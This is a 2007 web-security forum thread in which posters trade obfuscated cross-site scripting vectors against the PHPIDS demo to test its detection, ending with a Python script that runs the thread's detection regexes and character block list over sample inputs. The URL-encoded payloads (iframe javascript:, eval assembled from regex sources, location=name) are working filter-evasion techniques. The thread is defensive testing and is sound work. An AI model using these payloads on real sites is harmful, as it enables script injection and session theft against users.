Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 07, 2007 11:10PM

Wow!

That was unexpected and I am speechless!

Web Application Security Journ(ey)al

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Martin
Date: July 08, 2007 05:15AM

Totally evil - awesome vector SDC!

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 08, 2007 06:58AM

It's a pity XML predicates don't work in IE :(

This one is cross-browser, though:
http://demo.php-ids.org/?test=%24_%3Ddocument%2C%24__%3D%24_.URL%2C%24___%3Dunescape%2C%24_%3D%24_.body%2C%24_.innerHTML%20%3D%20%24___(http%3D%24__)#%3Ciframe%20src%3D%22javascript%3Atop.document.body.firstChild.nodeValue%3D''%2Calert('PWND%20%3A)')%22%3E%3C%2Fiframe%3E%3Cdiv%20style%3D'text-align%3A%20center%3B%20background%3A%20yellow'%3E%3Ch2%3EPWND%20by%20ma1%3C%2Fh2%3E%3Ca%20href%3D'http%3A%2F%2Fnoscript.net'%3EThere's%20a%20browser%20safer%20than%20Firefox...%20it's%20Firefox%2C%20with%20NoScript%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fbody%3E%3C%2Fhtml%3E

Have a nice Sunday :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 08, 2007 05:40PM

@.mario:
wow, that's been fast.
Starting to pant, like SDC :)

This one is still cross-browser, with some "bouncing":

http://hackademix.net/name.xss/http://demo.php-ids.org/?test=setTimeout//%0D%0A%28name//%0D%0A,0%29///payloadId=1

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 08, 2007 09:56PM

ma1 Wrote:
-------------------------------------------------------
> .mario Wrote:
> -------------------------------------------------------
> > @Ronald: I agree when talking about GET Requests.
>
> So these are all illegal, right?
>
> http://en.wikipedia.org/wiki/Heroes_(TV_series%29
>
> http://kb.mozillazine.org/Label%3D%22%26blockImageCmd._label%3B%22
>
> http://developer.mozilla.org/en/docs/Core_JavaScript_1.5_Reference:Global_Functions:eval
>
> And I didn't even add any query string :)
>
> As for the tilde character, ~, maybe you're too young to remember the time when most of the web URLs contained one (especially in .edu sites), because it's a Unix shortcut for the user's home.
>
> Finally, ?param=& is quite common and legal, since it's sent every time an optional field is left empty in a form.


Yeah, that's why Wikipedia sucks as an example, because they work in a very different way by using a meta language, so that doesn't really count. I mean, in "normal" queries I've never seen those chars; some do, sure. But the only ones I use are pipes or spaces, which are pretty standard in developing. The rest I detect upon. That said, without the quote set ' " and the less/greater signs < > (which are illegal, btw) it is nearly impossible to construct a good injection; the rest is refinement upon them.

So when you detect them, you are half the way.

Oh yeah I'm way too old to remember the tilde ~
my first homepage had one, I'm close to 30 now, so I know this was a special reference character back then.

Just like the < > ' " chars are. Ever saw one in a normal query?

Yeah, I know why I love standards, standards in developing, just because of this mayhem alone.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 08, 2007 10:06PM

@.mario

Clearly it's impossible to detect everything with RegExes alone; that is exactly why I block single chars like ' " < > on the request URI in my .htaccess, because they never happen. I have a few more, but those are only for my site.

So, like you proposed, I guess it would be a very good idea to have a triage upon such datasets. The previous examples are nice and all, but pretty useless to launch a sensible attack. Only a few characters should be detected upon in every instance.

Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyone's reaction upon it, since I have already used this method for over a year now.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 04:12AM

@all, @ma1: Nice ones aaand fixed ;) As already posted in the group, the timed-out one is pretty neat!

@Ronald: Yep - I guess we'll have to discuss that with christ1an and lars too, but I think it's no bad idea. Let's chitchat later about the PHPIDS for PHP4 if you like. We are planning to release 0.3 on Thursday and it would be a nice feature to have aboard in this version.

Greetings,
.mario

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 06:44AM

Vector of the day:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a=/ev///%0a.source%0aa%2b=/al///%0a.source%0aa%5ba%5d%20%28name%29***content

Slight variation:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=a%3D/ev/%20%0A.source%0Aa%2B%3D/al/%20%0A.source%2Ca%20%3D%20a%5Ba%5D%0Aa%28name%29***content

Cheers

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 3 time(s). Last edit at 07/09/2007 07:35AM by ma1.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Ivan
Date: July 09, 2007 09:12AM

Ronald wrote:

"Like ma1 said, it's not a good idea to block =&()[] because they (can) happen. At least the few I mentioned, are almost a must to launch a sensible attack: ' " < >

Love to hear anyones reaction upon it, since I already use this method for over a year now."

I agree with this; on some of my projects I only block the mentioned chars (' " < >), all others are allowed and properly handled with application logic.

http://www.security-net.biz/

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 10:09AM

@ma1: fixed and fixed

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 10:32AM

@.mario:
Since you're not satisfied yet with PHPIDS' newline attack detection, here is a one-liner for fairness' sake :)

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=b%3Dtop%2Ca%3D/loc/%20.%20source%2Ca%2B%3D/ation/%20.%20source%2Cb%5Ba%3Da%5D%20%3D%20name***content,

BTW, if anyone is interested, I've just generalized name.xss for general consumption. Here's a "man page".

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: kishord
Date: July 09, 2007 01:50PM

a=alert
a(0)

This harmless vector is still alive.

Web Application Security Journ(ey)al

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 01:59PM

That little.. ******* ;) Thx kishord - almost forgot it!

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 02:34PM

@.mario:
Excuse my ignorance, but what exactly is the magic of "y" in

(?:[^y](?:hash|host|hostname|href|source|pathname|port|protocol|searcages|links|cookie|innerhtml|innertext|outerhtml)\s*(?:[^\w\s]|\n))]

and

(?:[^y](?:charat|charcodeat|concat|fromcharcode|indexof|lastindexof|match|replace|search|slice|split|substr|substring|escape)\s*(?:[^\w\s]|\n))

Probably related, why

&yport=80

is innocuous while

&xport=80

is almost as evil as the terrible

&port=80

? :)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 2 time(s). Last edit at 07/09/2007 03:21PM by ma1.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: ma1
Date: July 09, 2007 02:55PM

kishord Wrote:
-------------------------------------------------------
> a=alert
> a(0)
>
> This harmless vector is still alive

Speaking of super-simple stuff, this not so harmless one is too:

http://hackademix.net/name.xss/***http://demo.php-ids.org/?test=location=name***content,post

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 07/09/2007 03:01PM by ma1.

Re: InternetExplorer "javascript/vbscript" aliases
Posted by: Anonymous User
Date: July 09, 2007 04:09PM

Hi!

The mysterious y is a relic from when we had lots of false positives by the Yahoo page slurp spider - and since no critical JS function matches the pattern y\w+, we just fixed the issue that way.

The location=name vector is evil - I hate the self-contained stuff via name, because it's almost undetectable. I mean, okay - you can detect location[^\w\s]\n*name, but that would just catch the un-obfuscated ones.

Have to think about that...

Greetings,
.mario
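
As an added example (not code from the thread, and not PHPIDS' own rule set), the following Python runs a simplified form of the quoted `[^y]` rule, Ronald's four-character filter and .mario's `location[^\w\s]\n*name` pattern over inputs taken from this thread. It shows why `&yport=80` slips past the `[^y]` prefix while `&xport=80` and `&port=80` match, and why `location=name` and the decoded `b[a=a] = name` vector carry none of the four blocked characters. The property list is shortened to the names legible on the page.

```python
import re

# Simplified version of the rule quoted in the thread (not PHPIDS' exact rule):
# a DOM property name preceded by any character other than "y", then optional
# whitespace, then a non-word, non-space character or a newline.
DOM_PROPERTY_RULE = re.compile(
    r"[^y](?:hash|host|hostname|href|source|pathname|port|protocol|search"
    r"|cookie|innerhtml|innertext|outerhtml)\s*(?:[^\w\s]|\n)",
    re.IGNORECASE,
)

# .mario's suggested pattern for the un-obfuscated location=name vector.
LOCATION_NAME_RULE = re.compile(r"location[^\w\s]\n*name", re.IGNORECASE)

# Ronald's .htaccess approach: reject any request URI containing one of these.
BLOCKED_CHARS = set("'\"<>")


def dom_rule_hits(query: str) -> bool:
    """True if the [^y]-prefixed DOM property rule fires on the query."""
    return DOM_PROPERTY_RULE.search(query) is not None


def location_rule_hits(query: str) -> bool:
    """True if the literal location=name pattern fires on the query."""
    return LOCATION_NAME_RULE.search(query) is not None


def char_filter_hits(query: str) -> bool:
    """True if the query contains any of the four blocked characters."""
    return any(c in BLOCKED_CHARS for c in query)


def classify(query: str) -> dict:
    """Run all three checks; a defender would want them layered, not alone."""
    return {
        "dom_rule": dom_rule_hits(query),
        "location_rule": location_rule_hits(query),
        "chars": char_filter_hits(query),
    }


# Constructed inputs, URL-decoded, from the vectors and parameters discussed above.
SAMPLES = [
    "&yport=80",                  # innocuous per ma1: "y" blocks the rule
    "&xport=80",                  # flagged: "x" is a valid [^y] prefix
    "&port=80",                   # flagged: "&" is a valid [^y] prefix
    "location=name",              # no quotes/brackets, DOM rule silent
    "b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r}: {classify(s)}")
```

The last sample shows the layering point: the character filter never fires on it, but `. source,` still trips the DOM property rule, while the literal `location=name` pattern catches only the un-obfuscated form.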
